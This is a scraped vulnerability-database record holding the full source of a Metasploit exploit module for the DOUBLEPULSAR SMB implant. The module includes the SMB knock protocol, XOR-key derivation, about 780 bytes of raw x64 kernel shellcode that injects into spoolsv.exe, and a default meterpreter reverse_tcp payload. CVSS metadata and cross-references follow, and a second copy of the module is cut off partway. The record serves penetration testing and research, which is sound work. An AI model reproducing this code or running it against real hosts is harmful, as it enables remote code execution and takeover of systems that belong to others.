Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-01] #"}, "lastseen": "2021-10-01T00:17:03", "differentElements": ["sourceData"], "edition": 31}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "2f15f57c3d400210b1a7bed66090eb9b", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-01T22:17:13", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", 
"1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:25:08", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-29T22:25:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 